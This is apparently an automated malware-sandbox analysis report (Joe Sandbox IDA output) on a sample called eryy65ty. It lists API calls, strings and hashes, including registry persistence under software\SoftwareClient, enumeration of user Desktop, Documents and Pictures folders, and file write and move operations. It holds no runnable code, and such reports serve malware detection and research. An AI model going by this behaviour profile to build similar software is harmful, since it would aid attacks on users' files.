                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterValue$Leave$Event
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 3315918275-1769526761
                                                                                                      • Opcode ID: 86c317fdb646c190aba121348fcdd5224c30f74171e74cb084a125ba900d3b1d
                                                                                                      • Instruction ID: 31afaf6623b02c9ced39fcd10eb47f1c7ff017ca0727466a5f01c6ff84b716d2
                                                                                                      • Opcode Fuzzy Hash: 86c317fdb646c190aba121348fcdd5224c30f74171e74cb084a125ba900d3b1d
                                                                                                      • Instruction Fuzzy Hash: A751DFB1E046489FDB25DFA5D848BEFBFF4AF14304F04121AE412B2290D7B5A988CB91

                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,software\SoftwareClient,00000000,00000000,00000000,000F003F,00000000,AB1AAB9C,00000000,AB1AAB9C), ref: 00E378B0
                                                                                                      • RegSetValueExW.KERNELBASE(?,?,00000000,00000003,?,?,?,?,?,?,?,?,000000FF), ref: 00E37901
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?), ref: 00E37922
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValue
                                                                                                      • String ID: <- :sizeof key$EncodingParameters$Error opening key.$Error writing to Registry.$Success opening key.$Success writing to Registry.$software\SoftwareClient
                                                                                                      • API String ID: 1818849710-1185376041
                                                                                                      • Opcode ID: 05114067f72b0c5be61f8a03edbb5a9d658a15969c9a3402de7237d081d5d4a2
                                                                                                      • Instruction ID: f100c93caebc0274e244dfa65b6196f7e69dff3017858624b3f87412c80b28d4
                                                                                                      • Opcode Fuzzy Hash: 05114067f72b0c5be61f8a03edbb5a9d658a15969c9a3402de7237d081d5d4a2
                                                                                                      • Instruction Fuzzy Hash: 59410471604248ABDB249F34DC4ABBF7BAADBC1710F105239F955B7381DB72DA04CA51

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00E3D85C,00E3B65C,?), ref: 00E9C681
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?), ref: 00E9C690
                                                                                                      • __dosmaperr.LIBCMT ref: 00E9C697
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?), ref: 00E9C6A8
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,?,?), ref: 00E9C6D8
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,00000000,?,00000000,00000000,?), ref: 00E9C6EF
                                                                                                      • _free.LIBCMT ref: 00E9C715
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ErrorLast__dosmaperr_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3033228717-0
                                                                                                      • Opcode ID: 0aa0c116286c898ec77240417e7e8b0e33a8b88a9804b0af53e10eefbbb93a91
                                                                                                      • Instruction ID: 3dd408e0f762c8dc4cf3aac9006c0a65efe0a8626203c76c810d3546de823a8c
                                                                                                      • Opcode Fuzzy Hash: 0aa0c116286c898ec77240417e7e8b0e33a8b88a9804b0af53e10eefbbb93a91
                                                                                                      • Instruction Fuzzy Hash: B12181B6501218BFDF21ABF6DC89DBF7BACEB897A0B201115F905E6250DB709D009B70

                                                                                                      APIs
                                                                                                      • SHGetKnownFolderPath.SHELL32(00EBB350,-00000001,-00000001,00000000,AB1AAB9C,?), ref: 00E3F9AC
                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,-00000002), ref: 00E3F9DB
                                                                                                      Similarity
                                                                                                      • API ID: FolderFreeKnownPathTask
                                                                                                      • String ID: Desktop$Documents$Downloads$Pictures$Videos
                                                                                                      • API String ID: 969438705-3807122180
                                                                                                      • Opcode ID: 10393e6b29e9a48a8825ff096d374806bc3fc58946e358ecdcb97057ed0d5486
                                                                                                      • Instruction ID: 19eaf3e507b66de9137d4c41fea345c903a59fa3dc6d70da67d47b3bd2912459
                                                                                                      • Opcode Fuzzy Hash: 10393e6b29e9a48a8825ff096d374806bc3fc58946e358ecdcb97057ed0d5486
                                                                                                      • Instruction Fuzzy Hash: 0451DF76E00105ABCB188F58C948BBBBFB5FF85324F501169E806BB350DB709D81CBA5
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 0-537541572
                                                                                                      • Opcode ID: 77657e0375ad46538ad05f28a4d0613703ac83dde90b9223dcf7268d70c66c80
                                                                                                      • Instruction ID: a04ee984716fb46409d4dab7f04bea840bff582ff7ae61092fa38b81817e590a
                                                                                                      • Opcode Fuzzy Hash: 77657e0375ad46538ad05f28a4d0613703ac83dde90b9223dcf7268d70c66c80
                                                                                                      • Instruction Fuzzy Hash: 7621FCB2901226ABC7314A29AC45B6B77989FCB764F112120F915BF2D0D7B0FC10C5D0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E322E0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3B711
                                                                                                      Similarity
                                                                                                      • API ID: Ios_base_dtor___std_exception_copystd::ios_base::_
                                                                                                      • String ID: (_$0xABADCABA$eof :$|a
                                                                                                      • API String ID: 2061216789-2373377734
                                                                                                      • Opcode ID: 2558b926632f2b44d870daf8deda0cc7327643636fb049c5fc15322095f588a4
                                                                                                      • Instruction ID: df6abf954f6130a09ccde9ec2204b650fa37a0c660bfda4aa6ca7d55b425a215
                                                                                                      • Opcode Fuzzy Hash: 2558b926632f2b44d870daf8deda0cc7327643636fb049c5fc15322095f588a4
                                                                                                      • Instruction Fuzzy Hash: 84F1BF70A00248CFDB10DF68C889B9EBBF5BF44314F5495A9E54ABB292D771EA84CF50
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E334F0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000000,AB1AAB9C), ref: 00E33530
                                                                                                        • Part of subcall function 00E334F0: GetLastError.KERNEL32(?,80000000,AB1AAB9C), ref: 00E3353A
                                                                                                        • Part of subcall function 00E33B20: CreateEventW.KERNEL32 ref: 00E33C0C
                                                                                                        • Part of subcall function 00E33B20: GetLastError.KERNEL32 ref: 00E33C18
                                                                                                        • Part of subcall function 00E33B20: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E33C4D
                                                                                                        • Part of subcall function 00E33B20: GetLastError.KERNEL32 ref: 00E33C5A
                                                                                                        • Part of subcall function 00E33B20: CloseHandle.KERNEL32(00000000), ref: 00E33C65
                                                                                                      • EnterCriticalSection.KERNEL32(009192F0,?,?,?,0000006C,?), ref: 00E3476D
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,0000006C,?), ref: 00E347DA
                                                                                                      Similarity
                                                                                                      • API ID: CriticalErrorLastSection$CreateEvent$CloseCountEnterHandleInitializeLeaveSpin
                                                                                                      • String ID: @a$d$mutex
                                                                                                      • API String ID: 539720752-3305263385
                                                                                                      • Opcode ID: 638def4b05f8d550a94f7b2b3c1c81bda5da0102a8ae5146276a81ed83d12552
                                                                                                      • Instruction ID: 132f846fab1e63ec548efa57f86c8e71b4276fbb25df26861c56cffb93d5a508
                                                                                                      • Opcode Fuzzy Hash: 638def4b05f8d550a94f7b2b3c1c81bda5da0102a8ae5146276a81ed83d12552
                                                                                                      • Instruction Fuzzy Hash: 9171AAB0D043488FDB14DFA5C849BAEBBF4AF58304F14511EE809BB291D7B5AA04CBA0
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(?,?,Function_00068D99,00000000,?,?), ref: 00E98F40
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00E33898,00000000,00000000,00E33940,?,00000000), ref: 00E98F4C
                                                                                                      • __dosmaperr.LIBCMT ref: 00E98F53
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                                      • String ID: @9
                                                                                                      • API String ID: 2744730728-1740763812
                                                                                                      • Opcode ID: 78a3b75134a6c9a8762664ba0221391183817cdbe0b7198c89c9a1ade427e857
                                                                                                      • Instruction ID: a8d9bc84bbd26dff0ea68a35411ea7e8afdea3795065a89b0b56dd97d05552f5
                                                                                                      • Opcode Fuzzy Hash: 78a3b75134a6c9a8762664ba0221391183817cdbe0b7198c89c9a1ade427e857
                                                                                                      • Instruction Fuzzy Hash: E4018C72A1020EEFDF14EFA0DE15AAE7BA9EF02364F106158B805B6160DF758E10DB90
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,?), ref: 00E3AF6D
                                                                                                      • RegGetValueA.KERNELBASE(?,00ED385B,?,00000008,00000000,?,?), ref: 00E3AF91
                                                                                                      Strings
                                                                                                      • Software\SoftwareClient, xrefs: 00E3AF63
                                                                                                      Similarity
                                                                                                      • API ID: OpenValue
                                                                                                      • String ID: Software\SoftwareClient
                                                                                                      • API String ID: 3130442925-1782167085
                                                                                                      • Opcode ID: af0c83991ae14302ead75384626c2014e0a8233a561a227810b26a31c58ce24d
                                                                                                      • Instruction ID: 1182365cbc5e54f00ba8f69a37664e9ab7e07cb520489cc09f322925549344a2
                                                                                                      • Opcode Fuzzy Hash: af0c83991ae14302ead75384626c2014e0a8233a561a227810b26a31c58ce24d
                                                                                                      • Instruction Fuzzy Hash: 8821A275600219AFDB24DF14DC05BFAB7B9EB14304F0441AAF508B7681DBB06B458BA0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00EE40B0,00000010), ref: 00E98DAC
                                                                                                      • ExitThread.KERNEL32 ref: 00E98DB3
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 1611280651-2505862506
                                                                                                      • Opcode ID: 5f09e914eb5a1cc2cb7db070c31c2ce3653d1e4abf6cab47892391decb521db9
                                                                                                      • Instruction ID: bbcdbcaeea8f7e1374d74efbad9c46b8c53daa2a8be324e987fe8a35b3e6e4a3
                                                                                                      • Opcode Fuzzy Hash: 5f09e914eb5a1cc2cb7db070c31c2ce3653d1e4abf6cab47892391decb521db9
                                                                                                      • Instruction Fuzzy Hash: AEF0C271600208AFDF10BFB0C94AA6F37B5FF4A700F101149F505BB2A1DBB06900CBA1
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0280b8b9ef7d57693787d65d00bc4111469c38589a5f6e6510c297a3e3fc1d4a
                                                                                                      • Instruction ID: 0b68f2e2eb005005c25530cb4f65af9bfa73ccd21e1be81cb3d3df7e46eebf34
                                                                                                      • Opcode Fuzzy Hash: 0280b8b9ef7d57693787d65d00bc4111469c38589a5f6e6510c297a3e3fc1d4a
                                                                                                      • Instruction Fuzzy Hash: BB61B172E00609AFDF11EBA8C881BEEBBB9EF0E355F146155E405BF191D670AD018B71
                                                                                                      APIs
                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 00E40D53
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E40DB9
                                                                                                      • __Thrd_sleep.LIBCPMT ref: 00E40DD7
                                                                                                      Similarity
                                                                                                      • API ID: Thrd_sleepUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1616912868-0
                                                                                                      • Opcode ID: 2e7020209d905b6d72aa55614ba1044abc8718a75f1df00cfa9cc8017b0e5a77
                                                                                                      • Instruction ID: aaacff9dbfbe5195027937dbd2db8091886f1906cf3981245dc40e31dfce317e
                                                                                                      • Opcode Fuzzy Hash: 2e7020209d905b6d72aa55614ba1044abc8718a75f1df00cfa9cc8017b0e5a77
                                                                                                      • Instruction Fuzzy Hash: D1417371A143049FC714EF68D88192BB7F8AF88754F111A2DF999B7291D770ED08CB92
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,00E34AB8,?,00EA5C1F,00E34AB8,00EE4490,0000000C,00EA5CC7,00000000), ref: 00EA5D3F
                                                                                                      • GetLastError.KERNEL32(?,00EA5C1F,00E34AB8,00EE4490,0000000C,00EA5CC7,00000000), ref: 00EA5D49
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA5D74
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2583163307-0
                                                                                                      • Opcode ID: 3de996da3b20f03e2533be8331c0e207f6c777122ccb194715c549ec02462177
                                                                                                      • Instruction ID: 57aa96abefe8c90a85e7cbe84e1eec658b8fbfed39fa3e56d83b1f4e319be89c
                                                                                                      • Opcode Fuzzy Hash: 3de996da3b20f03e2533be8331c0e207f6c777122ccb194715c549ec02462177
                                                                                                      • Instruction Fuzzy Hash: 95010833604A505EC6246274698D77F67898B8B738F391519F816FF1D1DB64BC858250
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA846B,00000000,00000000,00000002,00000000), ref: 00EA83F5
                                                                                                      • GetLastError.KERNEL32(?,00EA846B,00000000,00000000,00000002,00000000,?,00EA5A79,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00EA83FF
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA8406
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2336955059-0
                                                                                                      • Opcode ID: f15306912a624428dc2e06402d48359535075c36d540457e7ea8984ef4f5c33d
                                                                                                      • Instruction ID: 346d914c4edcbf0b9b81697bc4e38fb4ac2d5811e47658cc8260daac309b03e0
                                                                                                      • Opcode Fuzzy Hash: f15306912a624428dc2e06402d48359535075c36d540457e7ea8984ef4f5c33d
                                                                                                      • Instruction Fuzzy Hash: 2E01D832610119AFCF059F9ADC458AF7B69EB8A724B240345F821BF190EA71ED518790
                                                                                                      APIs
                                                                                                      • MoveFileExW.KERNELBASE(?,00000000,00000002,?,00E9C702,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,?), ref: 00EA703E
                                                                                                      • GetLastError.KERNEL32(?,00E9C702,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00EA7048
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA704F
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2142343326-0
                                                                                                      • Opcode ID: b173fccffd319d8e69060978cfaf93a29ff0a6a4e8ce7b62835cb5c6bddaa71e
                                                                                                      • Instruction ID: da38ae173dfc06fea0142c8e4fb67dff0852443706e65bdb0650fcdcd06b6e74
                                                                                                      • Opcode Fuzzy Hash: b173fccffd319d8e69060978cfaf93a29ff0a6a4e8ce7b62835cb5c6bddaa71e
                                                                                                      • Instruction Fuzzy Hash: A8D05232104208BBCF10ABF6EC09A2B3F5CAB86378F108210F52CE80A0EBB2C9109610
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E8C13F: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E8C14B
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E8283B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_taskstd::invalid_argument::invalid_argument
                                                                                                      • String ID: vector<bool> too long
                                                                                                      • API String ID: 740074529-842332957
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E55B62
                                                                                                      Strings
                                                                                                      • MontgomeryRepresentation: Montgomery representation requires an odd modulus, xrefs: 00E55AEF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: MontgomeryRepresentation: Montgomery representation requires an odd modulus
                                                                                                      • API String ID: 2659868963-124676765
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,?,?,,?,?,00000000,?,00EB0A0D,00000000,0000000C), ref: 00EB064F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-624703763
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fread_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2638373210-0
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000010,00000000,00000000,?,00EA5B25,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA567F
                                                                                                      • GetLastError.KERNEL32(?,00EA5B25,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE4470,00000010,00E9C8E7,00000000,00000000), ref: 00EA56A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00EA3F9E
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00EA3FB0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E48636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E488B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: 16243ef3c026ae7801040d78f313ee230b9adc28ea0a98488ea46b101d4c74e7
                                                                                                      • Instruction ID: 0c176b26a6138000dc7a25034f71e4aa2cd7cab13d8c6318b0600c75c97f0022
                                                                                                      • Opcode Fuzzy Hash: 16243ef3c026ae7801040d78f313ee230b9adc28ea0a98488ea46b101d4c74e7
                                                                                                      • Instruction Fuzzy Hash: 2E312472A002009BD71CEE78AD8556DB7E8EB89320FA4133EE869E73D1DB709D408751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 454dcea81cde766c41ba31f4af47a28be0328637e13ec8451305690ea74c0bb4
                                                                                                      • Instruction ID: 26f354bbf27c7a0525b5808d85eaa6992059c502e4a9579a288c0cd2252a4d62
                                                                                                      • Opcode Fuzzy Hash: 454dcea81cde766c41ba31f4af47a28be0328637e13ec8451305690ea74c0bb4
                                                                                                      • Instruction Fuzzy Hash: 7A012473601216AF9F168F2AEC81A9B33D6ABCA3747254120F905FF5E4DB70E8168780
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __wsopen_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347428461-0
                                                                                                      • Opcode ID: 831cb783b3007eda9f2488d51bcaf3d674919a9d9ef08f2111d3f1067f47184d
                                                                                                      • Instruction ID: 7d5c194664b22c08c05a2395f3ec0b64051dec53fa3dc6695b8ff25cfa195a17
                                                                                                      • Opcode Fuzzy Hash: 831cb783b3007eda9f2488d51bcaf3d674919a9d9ef08f2111d3f1067f47184d
                                                                                                      • Instruction Fuzzy Hash: D111187190410AAFCB15DF58E9419DF7BF5EF49314F104099F808AB312DA31E921CBA5
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3180E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2659868963-0
                                                                                                      • Opcode ID: 6fec12443024993ec87dab6e0e7ca8dac57ba139fdb4b3e43ee525f5566002ca
                                                                                                      • Instruction ID: c5c30370f303c152294cdd9b03bb566bd2b3172cd23d6364c88528ce74a660dd
                                                                                                      • Opcode Fuzzy Hash: 6fec12443024993ec87dab6e0e7ca8dac57ba139fdb4b3e43ee525f5566002ca
                                                                                                      • Instruction Fuzzy Hash: 0601263140430DB7CB14BEA5EC4699A77EC9E02360B50A526FA0CFA591FBB0E990C3D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 617c63332d8cd5fff6c8ea9ab8bdd2ac953f3b3e438d86f20c096a0dff62efe4
                                                                                                      • Instruction ID: 857620bf31f5ec731c90c6bc5d09225895e7cf856630132be5a65f3857d9bde0
                                                                                                      • Opcode Fuzzy Hash: 617c63332d8cd5fff6c8ea9ab8bdd2ac953f3b3e438d86f20c096a0dff62efe4
                                                                                                      • Instruction Fuzzy Hash: 12F0F973502A1456DE313A698E05B5A72D89F53374F242719F860B71E1CF74A90286B2
                                                                                                      APIs
                                                                                                      Memory Dump Source
